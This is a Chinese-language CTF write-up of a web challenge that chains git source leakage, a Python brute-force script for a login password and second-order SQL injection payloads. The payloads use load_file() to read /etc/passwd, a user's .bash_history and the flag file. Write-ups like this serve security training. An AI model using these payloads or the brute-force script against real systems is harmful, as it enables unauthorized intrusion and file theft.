三个点,git源码泄露,密码爆破,sql二次注入
点进去一个留言窗口,看了看源码,没啥
那就dirsearch扫一波,扫出来一堆git,那么就尝试GitHacker看看能不能跑出来源码
githacker --url http://111.200.241.244:49854/ --folder result3
进到result3里面发现一个write_do.php
看了看源码,明显没写完,case下面直接break
之前扫目录的时候还扫出来一个login.php,进去看看,发现用户名zhangwei,密码zhangwei***,看来是要爆破了
我本来是想着这可能是字母或者数字,结果在我计算了结果个数的时候,果断把字母可能性给去了,背一点的靶场超时了,密码可能还没跑出来
写个小脚本
import requests
import re
alphabets = ['0','1'
,'2','3','4','5','6','7','8','9']
keywords = []
for alpha1 in alphabets:
for alpha2 in alphabets:
for alpha3 in alphabets:
keywords.append(alpha1+alpha2+alpha3)
url='http://111.200.241.244:49854/login.php'
s=requests.session()
username = 'zhangwei'
for i in keywords:
password='zhangwei'+i
data={
'username':username,
'password':password
}
response=s.post(url=url,data=data)
if re.findall('alert',response.text)==[]:
print(i)
break
密码跑出来是zhangwei666
登录,查看控制台的时候发现有提示,程序员没commit就跑路了,emmmm,那就git log --reflog查看所有包含还没有提交的记录
git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c更新到最新版本
再看看write_do.php,case里面果然有逻辑了,看一下源码
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>
在category第一次insert以后,在comment.php里面调用的时候并没有用addslashes进行过滤,这就是本题的关键突破点
考虑comment里面的sql,
"insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
由于category没有被过滤,而页面上content即留言的内容是有回显的,所以可以尝试利用category去覆盖原有的content
具体做法如下,在发布时category填入1’,content=database(),/*
在发布成功后再在留言板中填入*/#
这样第二个sql语句就变成了
insert into comment
set category =1',content=database(),/*,
content =*/#,
bo_id = '$bo_id'
利用/**/和#注释掉了content和bo_id,这样会显得留言内容就是我们带过去的content
同理查看当前用户1',content=user(),/* */#
root用户
查看/etc/passwd 1',content=(select(load_file('/etc/paawd'))),/* */#
可以看到www用户使用了bash
直接查找/和/var/www/html里面都没有flag文件,看来是换了文件名
那么去www用户的家目录看看1',content=(select(load_file('/home/www/.bash_history'))),/* */#
cd /tmp/ unzip html.zip rm -f html.zip cp -r html /var/www/ cd /var/www/html/ rm -f .DS_Store service apache2 start
可以看到www用户在/tmp目录下解压了文件,并向/var/www目录下进行了复制,且删除了.DS_Store文件(相当于目录描述文件,可以知道当前目录下有哪些文件)
所幸/tmp下还有,查看/tmp下的.DS_STORE文件,文件太大,需要转成16进制,再转成字符串
1',content=(select hex(load_file('/tmp/html/.DS_Store'))),/* */#
找到flag文件的文件名flag_8946e1ff1ee3e40f.php
在/tmp/html目录读取的flag是假flag,真flag当然在/var/www/html里
1',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/* */#
参考视频链接:https://www.bilibili.com/video/BV1FM4y1G75g/